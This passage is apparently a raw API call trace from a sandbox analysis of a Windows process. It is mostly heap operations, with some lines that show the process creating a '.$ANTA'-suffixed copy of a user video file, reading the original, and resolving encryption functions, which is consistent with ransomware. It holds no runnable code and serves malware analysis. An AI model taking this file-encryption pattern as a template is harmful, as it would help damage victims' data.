0x43e25f0 [0098.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0098.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0098.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0098.459] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0098.459] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0098.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0098.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0098.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0098.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0098.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0098.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0098.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0098.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0098.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0098.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0098.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0098.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0098.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0098.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0098.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0098.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0098.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0098.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0098.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0098.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0098.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0098.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0098.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0098.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4590 [0098.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0098.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0098.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0098.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c68 [0098.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4590 | out: hHeap=0x1780000) returned 1 [0098.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0098.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0098.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0098.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0098.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0098.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0098.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a0e0 [0098.516] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc")) returned 0x10 [0098.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a0e0 | out: hHeap=0x1780000) returned 1 [0098.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c68 | out: hHeap=0x1780000) returned 1 [0098.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0098.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0098.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0098.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0098.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0098.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0098.517] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\E8Q4uNIBQS8v.flv.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\e8q4unibqs8v.flv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0098.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0098.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0098.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0098.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0098.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0098.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0098.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0098.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0098.518] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0098.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0098.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0098.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0098.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0098.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0098.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0098.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0098.518] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0098.518] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0098.519] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0098.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0098.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0098.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0098.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0098.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0098.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0098.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0098.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0098.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0098.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0098.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0098.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0098.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0098.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e08020 [0098.523] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0098.523] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0098.525] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x3b08, lpOverlapped=0x0) returned 1 [0098.526] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0098.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0098.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0098.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0098.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13b08) returned 0x4516010 [0098.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e08020 | out: hHeap=0x1780000) returned 1 [0098.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0098.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0098.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0098.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0098.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13b08) returned 0x4529b20 [0098.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0098.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.530] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0098.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0098.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0098.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0098.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0098.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13b08) returned 0x4516010 [0098.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0098.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0098.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0098.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0098.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.530] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0098.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0098.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0098.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0098.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0098.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0098.531] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0098.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0098.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0098.531] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0098.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0098.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0098.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0098.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0098.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0098.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0098.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0098.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13b08) returned 0x4516010 [0098.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0098.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0098.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0098.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2670 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0098.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0098.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca370 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13b08) returned 0x499a008 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0098.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0098.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0098.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0098.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0098.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0098.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0098.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0098.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0098.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0098.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0098.533] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0098.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0098.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0098.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0098.533] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0098.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0098.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0098.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0098.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0098.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0098.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0098.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0098.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0098.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0098.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0098.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0098.534] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0098.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0098.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0098.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0098.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0098.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0098.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0098.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0098.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0098.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0098.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0098.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0098.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0098.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0098.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0098.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0098.534] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0098.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0098.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 